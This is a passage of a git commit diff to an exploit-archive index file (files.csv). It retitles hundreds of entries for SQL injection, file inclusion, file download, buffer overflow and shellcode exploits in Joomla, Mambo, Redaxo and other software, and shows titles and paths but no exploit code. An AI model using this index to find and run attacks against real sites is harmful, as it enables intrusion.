DB: 2016-11-04
14 new exploits Microsoft Windows - Metafile (.WMF) Remote File Download Exploit Generator Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator) Redaxo CMS 3.2 - 'INCLUDE_PATH' Remote File Inclusion Redaxo 3.2 - 'INCLUDE_PATH' Remote File Inclusion Mambo Component com_loudmouth 4.0j - Remote File Inclusion Mambo Component com_loudmouth 4.0j - Remote File Inclusion Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download Sisfo Kampus 2006 - 'dwoprn.php f' Arbitrary File Download Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection Joomla! / Mambo Component com_catalogproduction - 'id' SQL Injection Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute DMXReady SDK 1.1 - Remote File Download DMXReady SDK 1.1 - Arbitrary File Download Joomla! 1.5.12 RCE via TinyMCE - Arbitrary File Upload Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload) Joomla! Component Jw_allVideos - Remote File Download Joomla! Component Jw_allVideos - Arbitrary File Download Trouble Ticket Software - ttx.cgi Remote File Download Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download Redaxo CMS 4.2.1 - Remote File Inclusion Redaxo 4.2.1 - Remote File Inclusion Joomla! Component Music Manager - Local File Inclusion Joomla! Component 'Music Manager' - Local File Inclusion Joomla! Component NeoRecruit (com_neorecruit Itemid) - Blind SQL Injection Joomla! Component 'com_neorecruit' - 'Itemid' Parameter Blind SQL Injection Joomla! Component artforms 2.1b7.2 rc2 - Multiple Vulnerabilities Joomla! Component PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection Joomla! Component 'com_artforms' 2.1b7.2 rc2 - Multiple Vulnerabilities Joomla! Component 'PaymentsPlus' 2.1.5 - Blind SQL Injection Joomla! Component Minify4Joomla! - Arbitrary File Upload / Persistent Cross-Site Scripting Joomla! Component IXXO Cart - SQL Injection Joomla! Component com_jomtube - (user_id) Blind SQL Injection / SQL Injection Joomla! Component redSHOP 1.0 (com_redshop pid) - SQL Injection Joomla! Component QuickFAQ (com_quickfaq) - Blind SQL Injection Joomla! Component 'Minify4Joomla' - Arbitrary File Upload / Persistent Cross-Site Scripting Joomla! Component 'IXXO Cart' - SQL Injection Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection Joomla! Component 'com_quickfaq' - Blind SQL Injection Joomla! Component MyHome (com_myhome) - Blind SQL Injection Joomla! Component MySms (com_mysms) - Arbitrary File Upload Joomla! Component Health & Fitness Stats - Persistent Cross-Site Scripting Joomla! Component 'com_myhome' - Blind SQL Injection Joomla! Component 'com_mysms' - Arbitrary File Upload Joomla! Component 'healthstats' - Persistent Cross-Site Scripting Joomla! Component Rapid Recipe - Persistent Cross-Site Scripting Joomla! Component 'Rapid-Recipe' - Persistent Cross-Site Scripting Joomla! Component EasyBlog - Persistent Cross-Site Scripting Joomla! Component 'EasyBlog' - Persistent Cross-Site Scripting Joomla! Component QContacts (com_qcontacts) - SQL Injection Joomla! Component 'com_qcontacts' - SQL Injection Joomla! Component RedShop 1.0.23.1 - Blind SQL Injection Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection Joomla! Component com_spa - SQL Injection (2) Joomla! Component com_staticxt - SQL Injection Joomla! Component 'com_spa' - SQL Injection (2) Joomla! Component 'com_staticxt' - SQL Injection Joomla! Component com_spa - SQL Injection (1) Joomla! Component 'com_spa' - SQL Injection (1) Joomla! Component com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta - SQL Injection Joomla! Component com_huruhelpdesk - SQL Injection Joomla! Component com_iproperty - SQL Injection Joomla! Component 'com_golfcourseguide' 0.9.6.0 - SQL Injection Joomla! Component 'com_huruhelpdesk' - SQL Injection Joomla! Component 'com_iproperty' - SQL Injection Joomla! Component Ozio Gallery (com_oziogallery) - SQL Injection Joomla! Component ITArmory (com_itarmory) - SQL Injection Joomla! Component 'com_oziogallery' - SQL Injection Joomla! Component 'com_itarmory' - SQL Injection Joomla! Component com_joomdle) 0.24 - SQL Injection Joomla! Component com_youtube - SQL Injection Joomla! Component 'com_joomdle' 0.24 - SQL Injection Joomla! Component 'com_youtube' - SQL Injection Joomla! Component com_Joomla-visites - Remote File Inclusion Joomla! Component 'com_Joomla-visites' - Remote File Inclusion Joomla! Component TTVideo 1.0 - SQL Injection Joomla! Component 'com_ttvideo' 1.0 - SQL Injection Joomla! Component appointinator 1.0.1 - Multiple Vulnerabilities Joomla! Component 'com_appointinator' 1.0.1 - Multiple Vulnerabilities Joomla! Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injections Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections Joomla! Component com_beamospetition - SQL Injection Joomla! Component 'com_beamospetition' - SQL Injection Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download Joomla! Component 1.0 'com_jdownloads' - Arbitrary File Upload Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload ADA IMGSVR 0.4 - Remote File Download ADA IMGSVR 0.4 - Arbitrary File Download Joomla! / Mambo Component com_buslicense - 'aid' Parameter SQL Injection Joomla! / Mambo Component 'com_buslicense' - 'aid' Parameter SQL Injection Joomla! / Mambo Component com_sermon 0.2 - 'gid' Parameter SQL Injection Joomla! / Mambo Component 'com_sermon' 0.2 - 'gid' Parameter SQL Injection Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_comments' 0.5.8.5g - 'id' Parameter SQL Injection Joomla! / Mambo Component com_iomezun - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_iomezun' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_Joomlavvz - 'id' Parameter SQL Injection Joomla! / Mambo Component com_most - 'secid' Parameter SQL Injection Joomla! / Mambo Component com_asortyment - 'katid' Parameter SQL Injection Joomla! / Mambo Component 'com_Joomlavvz' - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_most' - 'secid' Parameter SQL Injection Joomla! / Mambo Component 'com_asortyment' - 'katid' Parameter SQL Injection Joomla! / Mambo Component com_model - 'objid' Parameter SQL Injection Joomla! / Mambo Component com_omnirealestate - 'objid' Parameter SQL Injection Joomla! / Mambo Component 'com_model' - 'objid' Parameter SQL Injection Joomla! / Mambo Component 'com_omnirealestate' - 'objid' Parameter SQL Injection Joomla! / Mambo Component com_smslist - 'listid' Parameter SQL Injection Joomla! / Mambo Component com_activities - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_smslist' - 'listid' Parameter SQL Injection Joomla! / Mambo Component 'com_activities' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_lexikon - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_lexikon' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_team - SQL Injection Joomla! / Mambo Component com_iigcatalog - 'cat' Parameter SQL Injection Joomla! / Mambo Component com_formtool - 'catid' Parameter SQL Injection Joomla! / Mambo Component com_genealogy - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_team' - SQL Injection Joomla! / Mambo Component 'com_iigcatalog' - 'cat' Parameter SQL Injection Joomla! / Mambo Component 'com_formtool' - 'catid' Parameter SQL Injection Joomla! / Mambo Component 'com_genealogy' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_hello_world - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_hello_world' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_publication - 'pid' Parameter SQL Injection Joomla! / Mambo Component com_blog - 'pid' Parameter SQL Injection Joomla! / Mambo Component 'com_publication' - 'pid' Parameter SQL Injection Joomla! / Mambo Component 'com_blog' - 'pid' Parameter SQL Injection Joomla! / Mambo Component com_wines 1.0 - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_wines' 1.0 - 'id' Parameter SQL Injection Joomla! / Mambo Component com_inter - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_inter' - 'id' Parameter SQL Injection Joomla! / Mambo Component com_guide - 'category' Parameter SQL Injection Joomla! / Mambo Component 'com_guide' - 'category' Parameter SQL Injection Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections Joomla! / Mambo Component 'com_is' 1.0.1 - Multiple SQL Injections Joomla! / Mambo Component com_utchat 0.2 - Multiple Remote File Inclusion Joomla! / Mambo Component 'com_utchat' 0.2 - Multiple Remote File Inclusion Vana CMS - 'Filename' Parameter Remote File Download Vana CMS - 'Filename' Parameter Arbitrary File Download Joomla! Component Rapid-Recipe - HTML Injection Joomla! Component 'Rapid-Recipe' - HTML Injection Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection REDAXO - 'subpage' Parameter Cross-Site Scripting Redaxo CMS 5.0.0 - Multiple Vulnerabilities Redaxo 5.0.0 - Multiple Vulnerabilities DarkComet Server - Remote File Download Exploit (Metasploit) DarkComet Server - Arbitrary File Download (Metasploit) WinaXe 7.7 'FTP client' - Remote Buffer Overflow Rapid PHP Editor 14.1 - Remote Command Execution Memcached 1.4.33 - PoC (1) Memcached 1.4.33 - PoC (2) Memcached 1.4.33 - PoC (3) SweetRice 1.5.1 - Arbitrary File Download Axessh 4.2 - Denial Of Service SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution ETchat 3.7 - Cross-Site Request Forgery sNews 1.7.1 - Cross-Site Request Forgery sNews 1.7.1 - Arbitrary File Upload PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow nodCMS - Cross-Site Request Forgery Redaxo 5.2.0 - Cross-Site Request Forgery
This commit is contained in:
parent
1f59ca27c2
commit
1edbc5ecc4
16 changed files with 847 additions and 87 deletions
165
files.csv
165
files.csv
|
@ -1187,7 +1187,7 @@ id,file,description,date,author,platform,type,port
|
|||
1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003
|
||||
1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,asp,webapps,0
|
||||
1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - (news.asp hid) SQL Injection",2006-01-14,DetMyl,asp,webapps,0
|
||||
1420,platforms/windows/remote/1420.c,"Microsoft Windows - Metafile (.WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0
|
||||
1420,platforms/windows/remote/1420.c,"Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator)",2006-01-15,darkeagle,windows,remote,0
|
||||
1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",windows,remote,13701
|
||||
1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0
|
||||
1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0
|
||||
|
@ -1572,7 +1572,7 @@ id,file,description,date,author,platform,type,port
|
|||
1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - 'ROOT_PATH' Remote File Inclusion",2006-06-01,Kacper,php,webapps,0
|
||||
1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0
|
||||
1860,platforms/php/webapps/1860.txt,"Bytehoard 2.1 - (server.php) Remote File Inclusion",2006-06-01,beford,php,webapps,0
|
||||
1861,platforms/php/webapps/1861.txt,"Redaxo CMS 3.2 - 'INCLUDE_PATH' Remote File Inclusion",2006-06-02,beford,php,webapps,0
|
||||
1861,platforms/php/webapps/1861.txt,"Redaxo 3.2 - 'INCLUDE_PATH' Remote File Inclusion",2006-06-02,beford,php,webapps,0
|
||||
1862,platforms/cgi/remote/1862.c,"iShopCart - vGetPost() Remote Buffer Overflow (cgi)",2006-06-02,K-sPecial,cgi,remote,0
|
||||
1863,platforms/php/webapps/1863.txt,"Igloo 0.1.9 - (Wiki.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
|
||||
1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0
|
||||
|
@ -1732,7 +1732,7 @@ id,file,description,date,author,platform,type,port
|
|||
2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
|
||||
2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0
|
||||
2022,platforms/php/webapps/2022.txt,"Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
|
||||
2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
|
||||
2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
|
||||
2024,platforms/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
|
||||
2025,platforms/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0
|
||||
2026,platforms/php/webapps/2026.txt,"Mambo Component com_hashcash 1.2.1 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
|
||||
|
@ -4039,7 +4039,7 @@ id,file,description,date,author,platform,type,port
|
|||
4383,platforms/php/webapps/4383.txt,"Joomla! Component Restaurante - Arbitrary File Upload",2007-09-08,"Cold Zero",php,webapps,0
|
||||
4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion",2007-09-08,MhZ91,php,webapps,0
|
||||
4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0
|
||||
4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download",2007-09-10,k-one,php,webapps,0
|
||||
4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Arbitrary File Download",2007-09-10,k-one,php,webapps,0
|
||||
4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - (MGR) Multiple Remote File Inclusion",2007-09-10,QTRinux,php,webapps,0
|
||||
4388,platforms/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' SaveToFile() Insecure Method",2007-09-10,shinnai,windows,remote,0
|
||||
4389,platforms/windows/remote/4389.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow",2007-09-10,shinnai,windows,remote,0
|
||||
|
@ -4654,7 +4654,7 @@ id,file,description,date,author,platform,type,port
|
|||
5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
|
||||
5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
|
||||
5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
|
||||
5007,platforms/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
||||
5007,platforms/php/webapps/5007.txt,"Mambo Component 'com_newsletter' 4.5 - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
||||
5008,platforms/php/webapps/5008.txt,"Mambo Component 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
||||
5009,platforms/php/webapps/5009.txt,"Mambo Component 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
||||
5010,platforms/php/webapps/5010.txt,"Mambo Component 'com_glossary' 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
|
||||
|
@ -6661,7 +6661,7 @@ id,file,description,date,author,platform,type,port
|
|||
7092,platforms/php/webapps/7092.txt,"Joomla! Component com_books - (book_id) SQL Injection",2008-11-11,boom3rang,php,webapps,0
|
||||
7093,platforms/php/webapps/7093.txt,"Joomla! Component Contact Info 1.0 - SQL Injection",2008-11-11,boom3rang,php,webapps,0
|
||||
7094,platforms/php/webapps/7094.txt,"Pre Real Estate Listings - Arbitrary File Upload",2008-11-11,BackDoor,php,webapps,0
|
||||
7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component com_catalogproduction - 'id' SQL Injection",2008-11-11,boom3rang,php,webapps,0
|
||||
7095,platforms/php/webapps/7095.txt,"Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection",2008-11-11,boom3rang,php,webapps,0
|
||||
7096,platforms/php/webapps/7096.txt,"Joomla! Component Simple RSS Reader 1.0 - Remote File Inclusion",2008-11-11,NoGe,php,webapps,0
|
||||
7097,platforms/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0
|
||||
7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0
|
||||
|
@ -7174,7 +7174,7 @@ id,file,description,date,author,platform,type,port
|
|||
7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
|
||||
7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
|
||||
7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
|
||||
7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0
|
||||
7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,windows,remote,0
|
||||
7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0
|
||||
7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos,0
|
||||
7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0
|
||||
|
@ -7333,7 +7333,7 @@ id,file,description,date,author,platform,type,port
|
|||
7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - (index.php preview) Local File Inclusion",2009-01-14,Osirys,php,webapps,0
|
||||
7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps,0
|
||||
7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0
|
||||
7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Remote File Download",2009-01-14,ajann,asp,webapps,0
|
||||
7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,asp,webapps,0
|
||||
7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0
|
||||
7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Arbitrary File Upload",2009-01-15,ajann,asp,webapps,0
|
||||
7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 - (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0
|
||||
|
@ -9499,7 +9499,7 @@ id,file,description,date,author,platform,type,port
|
|||
10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0
|
||||
10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0
|
||||
10182,platforms/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,hardware,dos,0
|
||||
10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 RCE via TinyMCE - Arbitrary File Upload",2009-11-19,daath,php,webapps,80
|
||||
10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)",2009-11-19,daath,php,webapps,80
|
||||
10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0
|
||||
10185,platforms/bsd/dos/10185.txt,"SeaMonkey 1.1.8 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0
|
||||
10186,platforms/bsd/dos/10186.txt,"K-Meleon 1.5.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0
|
||||
|
@ -10489,7 +10489,7 @@ id,file,description,date,author,platform,type,port
|
|||
11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0
|
||||
11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0
|
||||
11446,platforms/php/webapps/11446.txt,"Mambo Component 'com_akogallery' - SQL Injection",2010-02-14,snakespc,php,webapps,0
|
||||
11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Remote File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0
|
||||
11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0
|
||||
11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0
|
||||
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0
|
||||
11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
|
||||
|
@ -10817,7 +10817,7 @@ id,file,description,date,author,platform,type,port
|
|||
11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0
|
||||
11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0
|
||||
11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0
|
||||
11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0
|
||||
11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download",2010-03-20,n01d,cgi,webapps,0
|
||||
11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection",2010-03-21,"Easy Laster",php,webapps,0
|
||||
11825,platforms/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0
|
||||
11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software - 'product.php' SQL Injection",2010-03-21,Asyraf,php,webapps,0
|
||||
|
@ -11218,7 +11218,7 @@ id,file,description,date,author,platform,type,port
|
|||
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0
|
||||
12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0
|
||||
12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
|
||||
12276,platforms/php/webapps/12276.txt,"Redaxo CMS 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0
|
||||
12276,platforms/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0
|
||||
12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-18,"cr4wl3r ",php,webapps,0
|
||||
12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps,0
|
||||
12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps,0
|
||||
|
@ -12436,7 +12436,7 @@ id,file,description,date,author,platform,type,port
|
|||
30100,platforms/windows/remote/30100.html,"British TeleCommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0
|
||||
14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS - 'news.php' SQL Injection",2010-06-29,GlaDiaT0R,multiple,webapps,80
|
||||
14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0
|
||||
14274,platforms/php/webapps/14274.txt,"Joomla! Component Music Manager - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0
|
||||
14274,platforms/php/webapps/14274.txt,"Joomla! Component 'Music Manager' - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0
|
||||
14142,platforms/arm/shellcode/14142.c,"Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode,0
|
||||
14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - 'CoolType.dll' Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,multiple,dos,0
|
||||
14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0
|
||||
|
@ -12514,7 +12514,7 @@ id,file,description,date,author,platform,type,port
|
|||
14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection",2010-07-05,"ADEO Security",php,webapps,0
|
||||
14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
|
||||
14250,platforms/php/webapps/14250.txt,"Joomla! Component NeoRecruit (com_neorecruit Itemid) - Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
|
||||
14250,platforms/php/webapps/14250.txt,"Joomla! Component 'com_neorecruit' - 'Itemid' Parameter Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
|
||||
14221,platforms/windows/shellcode/14221.html,"Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0
|
||||
14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
|
||||
14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
|
||||
|
@ -12552,8 +12552,8 @@ id,file,description,date,author,platform,type,port
|
|||
14261,platforms/arm/shellcode/14261.c,"ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0
|
||||
14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) - SQL Injection",2010-07-07,Sid3^effects,php,webapps,0
|
||||
14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery",2010-07-07,kalyanakumar,hardware,webapps,0
|
||||
14263,platforms/php/webapps/14263.txt,"Joomla! Component artforms 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0
|
||||
14265,platforms/php/webapps/14265.txt,"Joomla! Component PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0
|
||||
14263,platforms/php/webapps/14263.txt,"Joomla! Component 'com_artforms' 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0
|
||||
